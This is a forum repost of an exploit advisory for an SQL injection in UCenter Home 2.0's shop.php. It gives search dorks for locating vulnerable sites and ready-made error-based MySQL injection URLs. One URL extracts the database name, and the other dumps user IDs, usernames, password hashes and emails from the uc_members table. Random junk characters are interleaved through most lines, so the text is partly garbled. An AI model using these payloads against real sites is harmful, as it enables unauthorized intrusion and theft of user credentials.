2 n7 u5 r2 R; I) @__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
0 n# h, T' Y- S g$ L8 h2 X% O
5 T8 f+ P! M& A% r5 l% ^
$ ^% ]" |4 i+ s( F0 k7 G
# M! }0 ^ I5 O/ D7 i*/ Author : KnocKout
9 T9 F* Y' P5 ^. p8 ?, q4 b
9 |) H6 A8 @5 u/ O; P- _: P h" ^*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 5 f" A7 V! _% `4 _
' Y" }5 C" _! ^- A2 [3 i
*/ Contact: knockoutr@msn.com
( K0 n" u- r, k" D* q- j
/ e3 d6 T6 @8 D8 [# y n3 s" r" h* f) z: y*/ Cyber-Warrior.org/CWKnocKout
0 z0 x U$ g) D G- F
2 `4 L7 f) ?& D5 f) l3 Z! [% j__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
K& K/ I9 O @& o: r, F
4 g% B! e4 V: P# M; }Script : UCenter Home . @# @: e& d" z9 F1 o; v9 |+ p9 H
) n' l% s; B0 S8 n
Version : 2.0 : J. f& H. C* i2 j1 m. d
; m6 y; U+ ~0 x& e1 X
Script HomePage : http://u.discuz.net/
! I& F, E, _% C
. A8 E: ^2 m7 Q. u; G' `! t! u! L2 x__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== $ i# M; J3 X, P9 S" k" E: i
" O. r& k6 l% X9 ^
Dork : Powered by UCenter inurl:shop.php?ac=view
3 W5 J$ D) _0 F/ a
! ]1 P* _5 ?7 ]& L# h" kDork 2 : inurl:shop.php?ac=view&shopid= @+ `" ]: @' d& B
+ v5 J9 V( t& K, ~
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== , N. v7 x4 |, g/ K
4 i6 y5 o% N- A+ A* Z3 L
Vuln file : Shop.php * \ g# n7 s( @* C* p3 ~7 E5 ?
; Y; k1 G/ b+ F/ H6 R& v; yvalue's : (?)ac=view&shopid= / `9 |0 S: ?; h& ?5 |8 b
+ v* Q; C' o5 o& @
Vulnerable Style : SQL Injection (MySQL Error Based)
7 q( Q! [! f9 x0 r/ t2 B( b! V; _4 C. _/ U) m* i
Need Metarials : Hex Conversion
+ O3 q { u- U. B
, S& z! }5 N) h% z1 L: T__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
% ` `1 W4 D9 e
% ` r9 P% P9 w$ v1 NYour Need victim Database name.
- Z) H2 R+ |* d/ U
) W; |1 o7 a5 {1 s3 Y1 H1 {/ rfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
3 Q" j* W; c, l) V& k* ]- T% i. g T1 a2 l
.. + R Y! q" k' s
1 v4 B9 X" ]6 J/ P& c5 n* I5 RDB : Okey.
3 F; ~: ] x/ l5 K
3 Y( f$ o3 m( ^/ jyour edit DB `[TARGET DB NAME]` , i. V* S. g* Q6 B9 c, t6 x/ H
) J. s7 ^" [6 C: K9 m; L
Example : 'hiwir1_ucenter' f# `; l- B1 V( N
4 p y: J& C1 X" I9 f$ x8 Y. }
Edit : Okey.
" F7 i& X1 v8 q! p% x6 T |1 h g5 ]! U5 s
Your use Hex conversion. And edit Your SQL Injection Exploit.. 4 F9 l' o/ } K9 B6 ~, t
# h. R7 i8 C! I# F; Q4 c$ k
9 p" B6 M1 f! I/ O
% C f# f9 P; Z8 g c* d( _Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
; n9 Y- A* q2 t% l, I2 p: R |
发表于 2013-2-27 21:31:31
收藏
支持
反对